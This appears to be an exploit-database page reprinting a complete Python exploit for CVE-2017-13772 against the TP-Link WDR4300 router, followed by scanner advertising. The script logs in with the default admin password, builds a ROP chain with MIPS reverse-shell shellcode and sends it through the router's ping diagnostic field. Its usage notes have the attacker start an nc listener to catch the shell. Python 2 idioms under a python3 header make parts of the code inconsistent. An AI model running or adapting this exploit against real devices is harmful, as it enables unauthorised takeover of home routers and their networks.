tplink wdr4300 remote code execution (authenticated)

▸▸▸ Exploit & Vulnerability >>   remote exploit & hardware vulnerability




tplink wdr4300 remote code execution (authenticated) Code Code...
				
# Exploit Title: TP-Link WDR4300 - Remote Code Execution (Authenticated) # Date: 2020-08-28 # Exploit Author: Patrik Lantz # Vendor Homepage: https://www.tp-link.com/se/home-networking/wifi-router/tl-wdr4300/ # Version: TL-WDR4300, N750 Wireless Dual Band Gigabit Router # Tested on: Firmware version 3.13.33 and 3.14.3 # CVE : CVE-2017-13772 #!/usr/bin/python3 import sys import hashlib import base64 import requests import binascii import socket """ RCE via stack-based overflow on TP-Link WDR4300 (N750) devices, using CVE-2017-13772. Tested on Firmware versions 3.13.33, Build 130618 and 3.14.3 Build 150518, hardware WDR4300 v1 Usage: 1) Start listener on attacker machine: nc -nlvvp 31337 2) Execute script: python exploit.py <attacker_ip> """ def main(argv): if len(sys.argv) < 2: print("Usage: python exploit.py <attacker_ip>") sys.exit(1) password = "admin" target = "192.168.0.1:80" attacker_ip = sys.argv[1] attacker = binascii.hexlify(socket.inet_aton(attacker_ip)) ip = [attacker[i:i+2] for i in range(0, len(attacker), 2)] if '00' in ip or '20' in ip: print("[-] Specified attacker IP will result in bad characters being present in the shellcode. Avoid any IPs containing .0. and .32.") sys.exit(1) url = "http://" + target + "/" try: r = requests.get(url=url) except: print("[-] Could not connect to target: " + target) sys.exit(1) if 'WWW-Authenticate' in r.headers.keys(): if not 'WDR4300' in r.headers['WWW-Authenticate']: print("[-] This is not TP-Link WDR4300 (N750)") sys.exit(1) else: print("[-] This does not seem to be the web interface of a router!") credentials = "admin" + ":" + hashlib.md5(password).hexdigest() auth = base64.b64encode(credentials) url = "http://" + target + "/userRpm/LoginRpm.htm?Save=Save" print("[+] Setting target to: " + target) print("[+] Using default admin password: " + password) print("[+] Cookie set to: Authorization=Basic%20" + auth) h = {} h["Cookie"] = "Authorization=Basic%20" + auth h['Upgrade-Insecure-Requests'] = '1' h['Referer'] = 'http://' + target + '/' r = requests.get(url = url, headers=h) data = r.text if "httpAutErrorArray" in data: print('[-] Could not login to the admin interface') sys.exit(1) older_fw = False # older firmware, e.g., 3.13.33 if "<TITLE>Login Incorrect</TITLE>" in data: print("[-] Incorrect login, perhaps an older firmware? Sending digest authetnication using the Authorization header instead..") credentials = "admin:" + password auth = base64.b64encode(credentials) url = "http://" + target + "/" h = {} h["Authorization"] = "Basic%20" + auth h['Upgrade-Insecure-Requests'] = '1' h['Referer'] = 'http://' + target + '/' r = requests.get(url = url, headers=h) data = r.text if 'window.parent.location.href' not in data: print("[-] Failed to login to the admin interface") sys.exit(1) print('[+] Older firmware confirmed, successfully logged in') older_fw = True authenticated_url = data.split('window.parent.location.href = ')[1].split(';')[0].replace('"','') unique_id = '' if not older_fw: unique_id = authenticated_url.split('/userRpm')[0].split('/')[3] + '/' print("[+] Authentication succeeded, got unique id: " + unique_id.replace('/','')) # now we deliver the exploit payload via a GET request h['Referer'] = 'http://' + target + '/' + unique_id + 'userRpm/DiagnosticRpm.htm' # NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes) nopsled = "" for i in range(12): nopsled += "\x26\x40\x08\x01" # identified bad characters: 0x20,0x00 # Using reverse tcp shellcode from https://www.exploit-db.com/exploits/45541 buf = b"" buf += "\x24\x0f\xff\xfa" # li $t7, -6 buf += "\x01\xe0\x78\x27" # nor $t7, $zero buf += "\x21\xe4\xff\xfd" # addi $a0, $t7, -3 buf += "\x21\xe5\xff\xfd" # addi $a1, $t7, -3 buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1 buf += "\x24\x02\x10\x57" # li $v0, 4183 ( sys_socket ) buf += "\x01\x01\x01\x0c" # syscall 0x40404 buf += "\xaf\xa2\xff\xff" # sw $v0, -1($sp) buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) buf += "\x34\x0f\xff\xfd" # li $t7, -3 ( sa_family = AF_INET ) buf += "\x01\xe0\x78\x27" # nor $t7, $zero buf += "\xaf\xaf\xff\xe0" # sw $t7, -0x20($sp) buf += "\x3c\x0e\x7a\x69" # lui $t6, 0x7a69 ( sin_port = 0x7a69 ) buf += "\x35\xce\x7a\x69" # ori $t6, $t6, 0x7a69 buf += "\xaf\xae\xff\xe4" # sw $t6, -0x1c($sp) buf += "\x3c\x0e" + ip[0].decode('hex') + ip[1].decode('hex') # lui $t6, 0xAABB ( sin_addr = 0xAABB ... buf += "\x35\xce" + ip[2].decode('hex') + ip[3].decode('hex') # ori $t6, $t6, 0xCCDD ... 0xCCDD buf += "\xaf\xae\xff\xe6" # sw $t6, -0x1a($sp) buf += "\x27\xa5\xff\xe2" # addiu $a1, $sp, -0x1e buf += "\x24\x0c\xff\xef" # li $t4, -17 ( addrlen = 16 ) buf += "\x01\x80\x30\x27" # nor $a2, $t4, $zero buf += "\x24\x02\x10\x4a" # li $v0, 4170 ( sys_connect ) buf += "\x01\x01\x01\x0c" # syscall 0x40404 buf += "\x24\x0f\xff\xfd" # li t7,-3 buf += "\x01\xe0\x28\x27" # nor a1,t7,zero buf += "\x8f\xa4\xff\xff" # lw $a0, -1($sp) buf += "\x24\x02\x0f\xdf" # li $v0, 4063 ( sys_dup2 ) buf += "\x01\x01\x01\x0c" # syscall 0x40404 buf += "\x24\xa5\xff\xff" # addi a1,a1,-1 (\x20\xa5\xff\xff) buf += "\x24\x01\xff\xff" # li at,-1 buf += "\x14\xa1\xff\xfb" # bne a1,at, dup2_loop buf += "\x28\x06\xff\xff" # slti $a2, $zero, -1 buf += "\x3c\x0f\x2f\x2f" # lui $t7, 0x2f2f buf += "\x35\xef\x62\x69" # ori $t7, $t7, 0x6269 buf += "\xaf\xaf\xff\xec" # sw $t7, -0x14($sp) buf += "\x3c\x0e\x6e\x2f" # lui $t6, 0x6e2f buf += "\x35\xce\x73\x68" # ori $t6, $t6, 0x7368 buf += "\xaf\xae\xff\xf0" # sw $t6, -0x10($sp) buf += "\xaf\xa0\xff\xf4" # sw $zero, -0xc($sp) buf += "\x27\xa4\xff\xec" # addiu $a0, $sp, -0x14 buf += "\xaf\xa4\xff\xf8" # sw $a0, -8($sp) buf += "\xaf\xa0\xff\xfc" # sw $zero, -4($sp) buf += "\x27\xa5\xff\xf8" # addiu $a1, $sp, -8 buf += "\x24\x02\x0f\xab" # li $v0, 4011 (sys_execve) buf += "\x01\x01\x01\x0c" # syscall 0x40404 shellcode = nopsled + buf """ We control $ra, $s0 and $s1 via the buffer overflow. libc_base: 0x2aae2000 First ROP (sleep_gadget): 0x0004c974 + libc_base = 0x2ab2e974 0x0004c97c move t9, s0 0x0004c980 lw ra, (var_1ch) 0x0004c984 lw s0, (var_18h) 0x0004c988 addiu a0, zero, 2 ; arg1 0x0004c98c addiu a1, zero, 1 ; arg2 0x0004c990 move a2, zero 0x0004c994 jr t9 sleep is located at 0x00053ca0 => so $s0 = 0x2ab35ca0 This gadget calls sleep, in this gadget we also set the return adress to the second ROP gadget which is controlled by setting appropriate value on the stack location 0x1c($sp), i.e., the first value on the stack, due to the instruction at 0x0004c980. Second ROP (stack_gadget): 0x00039fa8 + libc_base = 0x2ab1bfa8 0x00039fa8 addiu s0, sp, 0x28 0x00039fac move a0, s3 0x00039fb0 move a1, s0 0x00039fb4 move t9, s1 0x00039fb8 jalr t9 This gadget will set s0 to point our shellcode on the stack, that must be located at sp+0x28. Then as we control s1, we jump to the last and third ROP gadget. Third ROP (call_gadget): 0x000406d8 + libc_base = 0x2ab226d8 0x000406d8 move t9, s0 0x000406dc jalr t9 Jump to the shellcode pointed in s0. """ sleep_addr = "\x2a\xb3\x5c\xa0" sleep_gadget = "\x2a\xb2\xe9\x74" stack_gadget = "\x2a\xb1\xbf\xa8" call_gadget = "\x2a\xb2\x26\xd8" junk = "J"*28 payload = "A"*160 + sleep_addr + call_gadget + sleep_gadget + junk + stack_gadget + shellcode p = {'ping_addr': payload, 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', 'pSize':64, 'overTime':'800', 'trHops':'20'} url = "http://" + target + "/" + unique_id + "userRpm/PingIframeRpm.htm" print("[+] Delivering exploit payload to: " + url) try: r = requests.get(url = url, params=p, headers=h, timeout=10) except: print("[+] Finished delivering exploit") if __name__ == "__main__": main(sys.argv[1:])

Tplink wdr4300 remote code execution (authenticated) Vulnerability / Exploit Source : Tplink wdr4300 remote code execution (authenticated)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.